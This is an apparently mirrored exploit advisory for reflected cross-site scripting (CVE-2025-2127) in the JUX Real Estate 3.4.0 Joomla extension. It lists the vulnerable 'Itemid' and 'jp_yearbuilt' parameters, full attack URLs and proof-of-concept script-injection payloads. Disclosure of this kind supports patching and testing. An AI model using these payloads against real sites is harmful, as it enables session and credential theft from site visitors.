Exploit for JUX Real Estate 3.4.0 Cross Site Scripting CVE-2025-2127

## https://sploitus.com/exploit?id=PACKETSTORM:189675
# Exploit Title: JUX Real Estate 3.4.0 - Multiple RXSS
    # Exploit Author: CraCkEr
    # Date: 26/02/2025
    # Vendor: JoomlaUX
    # Vendor Homepage: https://joomlaux.com/
    # Software Link: https://extensions.joomla.org/extension/jux-real-estate/
    # Demo Link: http://demo.joomlaux.com/#jux-real-estate
    # Tested on: Windows 11 Pro
    # Impact: Manipulate the content of the site
    # CWE: CWE-79 - CWE-74 - CWE-707
    # CVE:  CVE-2025-2127
    # VDB: VDB-299040
    
    
    ## Description
    
    Attacker can send to victim a link containing a malicious URL in an email or instant message
    can perform a wide variety of actions, such as stealing the victim's session token or login credentials
    
    
    Path:
    /extensions/realestate/index.php/properties/list/list-with-sidebar/realties
    
    
    
    GET parameter 'Itemid' is vulnerable to XSS
    
    https://website/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=[XSS]&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search
    
    Payload: l6wdv"><script>alert(1)</script>wz8nu
    
    
    GET parameter 'jp_yearbuilt' is vulnerable to XSS
    
    https://website/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=[XSS]&button=Search
    
    Payload: mzbpj"><script>alert(1)</script>flmo8
    
    
    [-] Done